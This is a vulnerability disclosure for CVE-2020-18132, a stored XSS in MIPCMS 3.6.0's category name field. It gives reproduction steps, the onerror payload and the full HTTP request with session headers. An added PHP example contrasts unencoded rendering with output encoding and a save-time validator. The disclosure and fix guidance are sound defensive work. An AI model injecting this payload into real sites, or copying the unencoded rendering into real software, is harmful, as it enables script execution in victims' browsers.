CVE-2020-18132: There is a Stored XSS in Administrator Panel · Issue #4 · sansanyun/mipcms
Cross Site Scripting (XSS) vulnerability in MIPCMS 3.6.0 allows attackers to execute arbitrary code via the category name field to categoryEdit.
1. After the administrator has logged in, open the following page:
http://127.0.0.1/?s=/admin/article/articleCategory/
2. Click ‘modify’.
3. Fill in the payload in Category Name:
"><imG/src=1 onerror=alert(1)>
4. Save.
5. The request packet:
POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://127.0.0.1/?s=/admin/article/articleCategory/
Content-Type: application/json;charset=utf-8
access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3
terminal: pc
uid: 9afb4393b6cddbeb7418ab77
access-token: 06cdb3c844508158ebb7483c221c9e63
Content-Length: 324
Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007
DNT: 1
Connection: close

{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}
6. Open the URL and the payload will trigger:
http://127.0.0.1/index.php?s=/article/123/
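
The payload begins with "> , which indicates the stored category name is written into a quoted HTML attribute without encoding. The following is an added example, not code from the report or from MIPCMS: it shows that rendering pattern next to an output-encoded version and a save-time check. The function names, the markup and the 64-character limit are assumptions.

```php
<?php
// Added illustration, not MIPCMS source; function names and markup are hypothetical.

// Constructed sample: the "name" and "url_name" values from the request in step 5.
$category = ['name' => '"><imG/src=1 onerror=alert(1)>', 'url_name' => '123'];

// Vulnerable pattern: the stored value is concatenated into a quoted attribute
// and into element text unencoded, so the leading "> ends the attribute and the tag.
function renderCategoryUnsafe(array $c): string
{
    return '<a href="/article/' . $c['url_name'] . '/" title="' . $c['name'] . '">'
        . $c['name'] . '</a>';
}

// Output encoding for HTML text and quoted attributes. ENT_QUOTES encodes both
// quote characters, so the value cannot leave the attribute it is written into.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderCategorySafe(array $c): string
{
    return '<a href="/article/' . rawurlencode($c['url_name']) . '/" title="' . e($c['name']) . '">'
        . e($c['name']) . '</a>';
}

// Second layer at save time (hypothetical policy): 1-64 characters, no markup
// metacharacters or control characters. Encoding on output is still required.
function isValidCategoryName(string $name): bool
{
    return preg_match('/^[^<>"\'&\x00-\x1F]{1,64}$/u', $name) === 1;
}

// True when the markup contains a literal <img start tag in any letter case.
function hasImgTag(string $html): bool
{
    return stripos($html, '<img') !== false;
}

$unsafe = renderCategoryUnsafe($category);
$safe   = renderCategorySafe($category);

echo "unsafe: $unsafe\n";
echo "safe:   $safe\n";
echo 'img element in unsafe output: ' . var_export(hasImgTag($unsafe), true) . "\n";
echo 'img element in safe output:   ' . var_export(hasImgTag($safe), true) . "\n";
echo 'name accepted at save time:   ' . var_export(isValidCategoryName($category['name']), true) . "\n";
```

Because the value is stored, every template that prints the category name needs the encoding, including the admin list page and the public /article/ pages.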